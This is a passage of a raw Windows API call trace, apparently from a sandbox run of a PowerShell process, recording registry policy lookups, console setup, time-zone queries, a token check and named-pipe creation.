lpdwProcessId=0xdae824 | out: lpdwProcessId=0xdae824) returned 0x5cc [0123.408] GetWindowThreadProcessId (in: hWnd=0x100de, lpdwProcessId=0xdae824 | out: lpdwProcessId=0xdae824) returned 0x80c [0123.408] GetWindowThreadProcessId (in: hWnd=0x9013e, lpdwProcessId=0xdae824 | out: lpdwProcessId=0xdae824) returned 0x1068 [0123.409] GetWindow (hWnd=0x9013e, uCmd=0x4) returned 0x0 [0123.410] IsWindowVisible (hWnd=0x9013e) returned 1 [0123.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x63194c8, Length=0x20000, ResultLength=0xdae8e4 | out: SystemInformation=0x63194c8, ResultLength=0xdae8e4*=0x23830) returned 0xc0000004 [0123.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x63394e8, Length=0x26030, ResultLength=0xdae8e4 | out: SystemInformation=0x63394e8, ResultLength=0xdae8e4*=0x19cd0) returned 0x0 [0123.719] WerSetFlags () returned 0x0 [0125.409] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0125.536] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xdae910, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xdae90c | out: pulNumLanguages=0xdae910, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xdae90c) returned 1 [0125.536] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xdae910, pwszLanguagesBuffer=0x534a9a4, pcchLanguagesBuffer=0xdae90c | out: pulNumLanguages=0xdae910, pwszLanguagesBuffer=0x534a9a4, pcchLanguagesBuffer=0xdae90c) returned 1 [0125.544] GetUserDefaultLocaleName (in: lpLocaleName=0xdae8a4, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0125.685] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xdae054, nSize=0x80 | out: lpBuffer="￿￿Úဢ玤㦀牥皴犞佚玭ᵑ鲰̠皴犞㦀牥胰犉㦀牥胰犉Ú啾玭￿￿Ú꛰珺￿￿佚玭刐玭䪌犨") returned 0x0 [0125.690] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xdae054, nSize=0x80 | out: lpBuffer="￿￿媬̢Úᩚ玺䐠̞\x01⌀") returned 0x0 [0131.714] CoCreateGuid (in: pguid=0xdadfc4 | out: pguid=0xdadfc4*(Data1=0x96f8924a, Data2=0xb0b3, Data3=0x45b6, Data4=([0]=0xa0, [1]=0x74, [2]=0x61, [3]=0xc0, [4]=0xfe, [5]=0x5e, [6]=0x5f, [7]=0x28))) returned 0x0 [0132.726] CoCreateGuid (in: pguid=0xdadfb8 | out: pguid=0xdadfb8*(Data1=0x59700786, Data2=0x7c3a, Data3=0x4067, Data4=([0]=0x8a, [1]=0x87, [2]=0x4b, [3]=0x2d, [4]=0xd9, [5]=0x2a, [6]=0x4c, [7]=0xef))) returned 0x0 [0132.726] CoCreateGuid (in: pguid=0xdadfb8 | out: pguid=0xdadfb8*(Data1=0x90c0bd0c, Data2=0xc6c4, Data3=0x43cd, Data4=([0]=0x88, [1]=0xa8, [2]=0x74, [3]=0x99, [4]=0x27, [5]=0x15, [6]=0x21, [7]=0xa))) returned 0x0 [0132.726] CoCreateGuid (in: pguid=0xdadfb8 | out: pguid=0xdadfb8*(Data1=0x4c7de072, Data2=0x346b, Data3=0x44d8, Data4=([0]=0xb8, [1]=0x90, [2]=0x8e, [3]=0x1c, [4]=0x0, [5]=0xf2, [6]=0xae, [7]=0xbf))) returned 0x0 [0132.726] CoCreateGuid (in: pguid=0xdadfb8 | out: pguid=0xdadfb8*(Data1=0x901da320, Data2=0xf8ca, Data3=0x4896, Data4=([0]=0xa8, [1]=0x7e, [2]=0xcf, [3]=0x49, [4]=0x3e, [5]=0x94, [6]=0x99, [7]=0xe7))) returned 0x0 [0132.726] CoCreateGuid (in: pguid=0xdadfb8 | out: pguid=0xdadfb8*(Data1=0xc4394f3f, Data2=0xc22a, Data3=0x492a, Data4=([0]=0x95, [1]=0xba, [2]=0xa3, [3]=0xee, [4]=0x80, [5]=0xb5, [6]=0xa5, [7]=0xc7))) returned 0x0 [0132.726] CoCreateGuid (in: pguid=0xdadfb8 | out: pguid=0xdadfb8*(Data1=0x903b8e36, Data2=0x23e6, Data3=0x4e9a, Data4=([0]=0x9e, [1]=0x27, [2]=0x6, [3]=0xaa, [4]=0xd4, [5]=0xee, [6]=0xa7, [7]=0x34))) returned 0x0 [0132.726] CoCreateGuid (in: pguid=0xdadfb8 | out: pguid=0xdadfb8*(Data1=0x3182a994, Data2=0x7f0a, Data3=0x43e6, Data4=([0]=0xa1, [1]=0x97, [2]=0xfa, [3]=0x45, [4]=0xab, [5]=0x93, [6]=0x40, [7]=0x61))) returned 0x0 [0132.727] CoCreateGuid (in: pguid=0xdadfb8 | out: pguid=0xdadfb8*(Data1=0xbe4c009e, Data2=0xe217, Data3=0x4db2, Data4=([0]=0x8e, [1]=0x5b, [2]=0x55, [3]=0x7c, [4]=0xa3, [5]=0x9e, [6]=0x5b, [7]=0xde))) returned 0x0 [0132.727] CoCreateGuid (in: pguid=0xdadfb8 | out: pguid=0xdadfb8*(Data1=0x75670429, Data2=0xc690, Data3=0x4cf9, Data4=([0]=0x9a, [1]=0x57, [2]=0xb3, [3]=0xef, [4]=0x9a, [5]=0xe6, [6]=0x59, [7]=0x59))) returned 0x0 [0132.727] CoCreateGuid (in: pguid=0xdadfb8 | out: pguid=0xdadfb8*(Data1=0xf0c78871, Data2=0x76c8, Data3=0x4548, Data4=([0]=0x82, [1]=0xc9, [2]=0x6f, [3]=0x7e, [4]=0x14, [5]=0xc5, [6]=0x1, [7]=0xf1))) returned 0x0 [0132.727] CoCreateGuid (in: pguid=0xdadfb8 | out: pguid=0xdadfb8*(Data1=0x45db0f6c, Data2=0xf48e, Data3=0x4cb4, Data4=([0]=0xb0, [1]=0xdd, [2]=0x2f, [3]=0xab, [4]=0x88, [5]=0x8c, [6]=0x55, [7]=0x6d))) returned 0x0 [0133.431] CoCreateGuid (in: pguid=0xdadfb8 | out: pguid=0xdadfb8*(Data1=0xab5b1e3b, Data2=0xbfd4, Data3=0x458b, Data4=([0]=0xad, [1]=0x89, [2]=0xc2, [3]=0x86, [4]=0x64, [5]=0x2f, [6]=0x49, [7]=0x6e))) returned 0x0 [0133.431] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xdadcd4, nSize=0xfa | out: lpBuffer="䳆玩⋝\x14\x01徠玤哨ر") returned 0x0 [0134.348] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xdae85c | out: phkResult=0xdae85c*=0x414) returned 0x0 [0134.349] RegQueryValueExW (in: hKey=0x414, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdae87c, lpData=0x0, lpcbData=0xdae878*=0x0 | out: lpType=0xdae87c*=0x1, lpData=0x0, lpcbData=0xdae878*=0x56) returned 0x0 [0134.349] RegQueryValueExW (in: hKey=0x414, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdae87c, lpData=0x5362ffc, lpcbData=0xdae878*=0x56 | out: lpType=0xdae87c*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xdae878*=0x56) returned 0x0 [0134.349] RegCloseKey (hKey=0x414) returned 0x0 [0134.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xdadecc, nSize=0xfa | out: lpBuffer="䳆玩᳕\x14\x01徠玤哨ر嬀玭\x01") returned 0x0 [0135.171] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0xdae82c | out: phkResult=0xdae82c*=0x0) returned 0x2 [0135.178] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0xdae82c | out: phkResult=0xdae82c*=0x0) returned 0x2 [0136.138] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x88 [0136.138] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x88, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0136.168] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xdae7d4 | out: phkResult=0xdae7d4*=0x63c) returned 0x0 [0136.175] RegQueryValueExW (in: hKey=0x63c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdae7f4, lpData=0x0, lpcbData=0xdae7f0*=0x0 | out: lpType=0xdae7f4*=0x1, lpData=0x0, lpcbData=0xdae7f0*=0x56) returned 0x0 [0136.175] RegQueryValueExW (in: hKey=0x63c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdae7f4, lpData=0x5369248, lpcbData=0xdae7f0*=0x56 | out: lpType=0xdae7f4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xdae7f0*=0x56) returned 0x0 [0136.175] RegCloseKey (hKey=0x63c) returned 0x0 [0136.964] CoTaskMemAlloc (cb=0x20c) returned 0x7662e80 [0136.964] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x7662e80 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Local") returned 0x0 [0136.969] CoTaskMemFree (pv=0x7662e80) [0136.969] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1e [0136.969] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local", nBufferLength=0x1e, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local", lpFilePart=0x0) returned 0x1d [0136.970] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0136.970] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell", nBufferLength=0x3b, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell", lpFilePart=0x0) returned 0x3a [0136.970] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdae854) returned 1 [0136.970] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\powershell"), fInfoLevelId=0x0, lpFileInformation=0xdae8d0 | out: lpFileInformation=0xdae8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3ec8443, ftCreationTime.dwHighDateTime=0x1d327c2, ftLastAccessTime.dwLowDateTime=0xdc924418, ftLastAccessTime.dwHighDateTime=0x1d327c2, ftLastWriteTime.dwLowDateTime=0xdc924418, ftLastWriteTime.dwHighDateTime=0x1d327c2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0136.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdae850) returned 1 [0136.979] CoCreateGuid (in: pguid=0xdae8e0 | out: pguid=0xdae8e0*(Data1=0xe433f946, Data2=0xb6bf, Data3=0x40e3, Data4=([0]=0x9d, [1]=0x27, [2]=0x32, [3]=0x30, [4]=0x56, [5]=0xec, [6]=0x48, [7]=0x6b))) returned 0x0 [0136.985] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription", ulOptions=0x0, samDesired=0x20019, phkResult=0xdae7c0 | out: phkResult=0xdae7c0*=0x0) returned 0x2 [0136.987] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription", ulOptions=0x0, samDesired=0x20019, phkResult=0xdae7c0 | out: phkResult=0xdae7c0*=0x0) returned 0x2 [0137.124] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xdade5c, nSize=0xfa | out: lpBuffer="䳆玩ᵅ\x14\x01徠玤哨ر䤀玩⎉") returned 0x0 [0137.131] CreateFileW (lpFileName="CONOUT$" (normalized: "\\device\\condrv\\currentout"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x624 [0137.333] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x624, lpConsoleScreenBufferInfo=0xdae86c | out: lpConsoleScreenBufferInfo=0xdae86c) returned 1 [0137.439] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x624, lpConsoleScreenBufferInfo=0xdae86c | out: lpConsoleScreenBufferInfo=0xdae86c) returned 1 [0137.576] GetConsoleMode (in: hConsoleHandle=0x624, lpMode=0xdae8d0 | out: lpMode=0xdae8d0) returned 1 [0137.736] SetConsoleMode (hConsoleHandle=0x624, dwMode=0x7) returned 1 [0137.945] GetConsoleMode (in: hConsoleHandle=0x624, lpMode=0xdae8d0 | out: lpMode=0xdae8d0) returned 1 [0138.157] GetStdHandle (nStdHandle=0xfffffff6) returned 0x198 [0138.157] GetFileType (hFile=0x198) returned 0x3 [0138.157] GetConsoleMode (in: hConsoleHandle=0x198, lpMode=0xdae7e8 | out: lpMode=0xdae7e8) returned 0 [0138.665] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ConsoleSessionConfiguration", ulOptions=0x0, samDesired=0x20019, phkResult=0xdae84c | out: phkResult=0xdae84c*=0x0) returned 0x2 [0138.676] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ConsoleSessionConfiguration", ulOptions=0x0, samDesired=0x20019, phkResult=0xdae84c | out: phkResult=0xdae84c*=0x0) returned 0x2 [0138.678] GetConsoleCP () returned 0x1b5 [0138.759] GetCurrentConsoleFontEx (in: hConsoleOutput=0x624, bMaximumWindow=0, lpConsoleCurrentFontEx=0xdae820 | out: lpConsoleCurrentFontEx=0xdae820) returned 1 [0138.895] SetConsoleCtrlHandler (HandlerRoutine=0x5072c66, Add=1) returned 1 [0138.896] GetStdHandle (nStdHandle=0xfffffff5) returned 0x19c [0138.896] GetFileType (hFile=0x19c) returned 0x3 [0138.901] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0xdae8ec | out: lpMode=0xdae8ec) returned 0 [0139.008] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0xdae0f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0xdae0f8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x12, [1]=0x4f, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0139.020] CoCreateGuid (in: pguid=0xdae7ac | out: pguid=0xdae7ac*(Data1=0x47360109, Data2=0xd413, Data3=0x4e7e, Data4=([0]=0xbe, [1]=0xc6, [2]=0xc4, [3]=0xdf, [4]=0x6b, [5]=0xb3, [6]=0x3c, [7]=0xb1))) returned 0x0 [0139.037] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0xdae7dc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0xdae7dc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x12, [1]=0x4f, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0139.159] EtwEventRegister (in: ProviderId=0x538d608, EnableCallback=0x5072c8e, CallbackContext=0x0, RegHandle=0x538d5e4 | out: RegHandle=0x538d5e4) returned 0x0 [0139.160] EtwEventSetInformation (RegHandle=0x75e8b20, InformationClass=0x4f, EventInformation=0x2, InformationLength=0x538d5b8) returned 0x0 [0139.167] CoTaskMemAlloc (cb=0x20c) returned 0x766a8e8 [0139.167] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x766a8e8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0139.167] CoTaskMemFree (pv=0x766a8e8) [0139.167] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x17 [0139.167] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x17, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0139.167] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xdadd28, nSize=0xfa | out: lpBuffer="䳆玩≱\x14\x01徠玤哨ر?盬ෞȌ") returned 0x0 [0139.179] GetCurrentProcessId () returned 0x1064 [0139.181] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1064) returned 0x63c [0139.182] GetProcessTimes (in: hProcess=0x63c, lpCreationTime=0x538e330, lpExitTime=0x538e338, lpKernelTime=0x538e340, lpUserTime=0x538e348 | out: lpCreationTime=0x538e330, lpExitTime=0x538e338, lpKernelTime=0x538e340, lpUserTime=0x538e348) returned 1 [0139.182] CloseHandle (hObject=0x63c) returned 1 [0139.184] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0xdad584 | out: pTimeZoneInformation=0xdad584) returned 0x2 [0139.191] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0xdad668 | out: phkResult=0xdad668*=0x63c) returned 0x0 [0139.192] RegQueryValueExW (in: hKey=0x63c, lpValueName="TZI", lpReserved=0x0, lpType=0xdad684, lpData=0x0, lpcbData=0xdad680*=0x0 | out: lpType=0xdad684*=0x3, lpData=0x0, lpcbData=0xdad680*=0x2c) returned 0x0 [0139.192] RegQueryValueExW (in: hKey=0x63c, lpValueName="TZI", lpReserved=0x0, lpType=0xdad684, lpData=0x538ed4c, lpcbData=0xdad680*=0x2c | out: lpType=0xdad684*=0x3, lpData=0x538ed4c*, lpcbData=0xdad680*=0x2c) returned 0x0 [0139.193] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0xdad4bc | out: phkResult=0xdad4bc*=0x0) returned 0x2 [0139.438] RegQueryValueExW (in: hKey=0x63c, lpValueName="MUI_Display", lpReserved=0x0, lpType=0xdad65c, lpData=0x0, lpcbData=0xdad658*=0x0 | out: lpType=0xdad65c*=0x1, lpData=0x0, lpcbData=0xdad658*=0x20) returned 0x0 [0139.439] RegQueryValueExW (in: hKey=0x63c, lpValueName="MUI_Display", lpReserved=0x0, lpType=0xdad65c, lpData=0x538f254, lpcbData=0xdad658*=0x20 | out: lpType=0xdad65c*=0x1, lpData="@tzres.dll,-320", lpcbData=0xdad658*=0x20) returned 0x0 [0139.439] RegQueryValueExW (in: hKey=0x63c, lpValueName="MUI_Std", lpReserved=0x0, lpType=0xdad65c, lpData=0x0, lpcbData=0xdad658*=0x0 | out: lpType=0xdad65c*=0x1, lpData=0x0, lpcbData=0xdad658*=0x20) returned 0x0 [0139.439] RegQueryValueExW (in: hKey=0x63c, lpValueName="MUI_Std", lpReserved=0x0, lpType=0xdad65c, lpData=0x538f2ac, lpcbData=0xdad658*=0x20 | out: lpType=0xdad65c*=0x1, lpData="@tzres.dll,-322", lpcbData=0xdad658*=0x20) returned 0x0 [0139.439] RegQueryValueExW (in: hKey=0x63c, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0xdad65c, lpData=0x0, lpcbData=0xdad658*=0x0 | out: lpType=0xdad65c*=0x1, lpData=0x0, lpcbData=0xdad658*=0x20) returned 0x0 [0139.439] RegQueryValueExW (in: hKey=0x63c, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0xdad65c, lpData=0x538f304, lpcbData=0xdad658*=0x20 | out: lpType=0xdad65c*=0x1, lpData="@tzres.dll,-321", lpcbData=0xdad658*=0x20) returned 0x0 [0139.442] CoTaskMemAlloc (cb=0x20c) returned 0x766a8e8 [0139.442] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x766a8e8 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0139.442] CoTaskMemFree (pv=0x766a8e8) [0139.442] CoTaskMemAlloc (cb=0x20c) returned 0x766a8e8 [0139.442] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0xdad678, pwszFileMUIPath=0x766a8e8, pcchFileMUIPath=0xdad67c, pululEnumerator=0xdad670 | out: pwszLanguage=0x0, pcchLanguage=0xdad678, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0xdad67c, pululEnumerator=0xdad670) returned 1 [0140.264] CoTaskMemFree (pv=0x0) [0140.264] CoTaskMemFree (pv=0x766a8e8) [0140.266] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x76d0001 [0144.425] CoTaskMemAlloc (cb=0x3ec) returned 0x76109e0 [0144.425] LoadStringW (in: hInstance=0x76d0001, uID=0x140, lpBuffer=0x76109e0, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c [0144.425] CoTaskMemFree (pv=0x76109e0) [0144.426] FreeLibrary (hLibModule=0x76d0001) returned 1 [0144.427] CoTaskMemAlloc (cb=0x20c) returned 0x766a8e8 [0144.427] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x766a8e8 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0144.427] CoTaskMemFree (pv=0x766a8e8) [0144.427] CoTaskMemAlloc (cb=0x20c) returned 0x766a8e8 [0144.427] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0xdad678, pwszFileMUIPath=0x766a8e8, pcchFileMUIPath=0xdad67c, pululEnumerator=0xdad670 | out: pwszLanguage=0x0, pcchLanguage=0xdad678, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0xdad67c, pululEnumerator=0xdad670) returned 1 [0144.428] CoTaskMemFree (pv=0x0) [0144.428] CoTaskMemFree (pv=0x766a8e8) [0144.428] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x76d0001 [0144.428] CoTaskMemAlloc (cb=0x3ec) returned 0x76109e0 [0144.428] LoadStringW (in: hInstance=0x76d0001, uID=0x142, lpBuffer=0x76109e0, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17 [0144.429] CoTaskMemFree (pv=0x76109e0) [0144.429] FreeLibrary (hLibModule=0x76d0001) returned 1 [0144.429] CoTaskMemAlloc (cb=0x20c) returned 0x766a8e8 [0144.429] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x766a8e8 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0144.429] CoTaskMemFree (pv=0x766a8e8) [0144.429] CoTaskMemAlloc (cb=0x20c) returned 0x766a8e8 [0144.429] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0xdad678, pwszFileMUIPath=0x766a8e8, pcchFileMUIPath=0xdad67c, pululEnumerator=0xdad670 | out: pwszLanguage=0x0, pcchLanguage=0xdad678, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0xdad67c, pululEnumerator=0xdad670) returned 1 [0144.430] CoTaskMemFree (pv=0x0) [0144.430] CoTaskMemFree (pv=0x766a8e8) [0144.430] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x76d0001 [0144.431] CoTaskMemAlloc (cb=0x3ec) returned 0x76109e0 [0144.431] LoadStringW (in: hInstance=0x76d0001, uID=0x141, lpBuffer=0x76109e0, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17 [0144.431] CoTaskMemFree (pv=0x76109e0) [0144.431] FreeLibrary (hLibModule=0x76d0001) returned 1 [0144.432] RegCloseKey (hKey=0x63c) returned 0x0 [0144.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x63394e8, Length=0x26030, ResultLength=0xdad898 | out: SystemInformation=0x63394e8, ResultLength=0xdad898*=0x19f00) returned 0x0 [0144.539] CreateWellKnownSid (in: WellKnownSidType=0x1a, DomainSid=0x0, pSid=0x53baae8, cbSid=0xdad8c8 | out: pSid=0x53baae8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), cbSid=0xdad8c8) returned 1 [0144.542] GetCurrentProcess () returned 0xffffffff [0144.542] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xdad874 | out: TokenHandle=0xdad874*=0x63c) returned 1 [0144.542] GetTokenInformation (in: TokenHandle=0x63c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xdad878 | out: TokenInformation=0x0, ReturnLength=0xdad878) returned 0 [0144.542] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x76203c8 [0144.542] GetTokenInformation (in: TokenHandle=0x63c, TokenInformationClass=0x8, TokenInformation=0x76203c8, TokenInformationLength=0x4, ReturnLength=0xdad878 | out: TokenInformation=0x76203c8, ReturnLength=0xdad878) returned 1 [0144.542] LocalFree (hMem=0x76203c8) returned 0x0 [0144.542] DuplicateTokenEx (in: hExistingToken=0x63c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xdad880 | out: phNewToken=0xdad880*=0x634) returned 1 [0144.543] CheckTokenMembership (in: TokenHandle=0x634, SidToCheck=0x53bb008*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xdad890 | out: IsMember=0xdad890) returned 1 [0144.543] CloseHandle (hObject=0x634) returned 1 [0144.657] CreateNamedPipeW (lpName="\\\\.\\pipe\\PSHost.132302823377932488.4196.DefaultAppDomain.powershell" (normalized: "\\device\\namedpipe\\pshost.132302823377932488.4196.defaultappdomain.powershell"), dwOpenMode=0x40080003, dwPipeMode=0x6, nMaxInstances=0x1, nOutBufferSize=0x8000, nInBufferSize=0x8000, nDefaultTimeOut=0x0, lpSecurityAttributes=0xdad834) returned 0x634 [0145.854] GetFileType (hFile=0x634) returned 0x3 [0147.143] CoTaskMemAlloc (cb=0x20c) returned 0x766a8e8 [0147.143] GetEnvironmentVariableW (in: lpName="PathEXT", lpBuffer=0x766a8e8, nSize=0x104 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0147.143] CoTaskMemFree (pv=0x766a8e8) [0150.640] SetEnvironmentVariableW (lpName="PathEXT", lpValue=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 1 [0177.722] CoCreateGuid (in: pguid=0xdad6e0 | out: 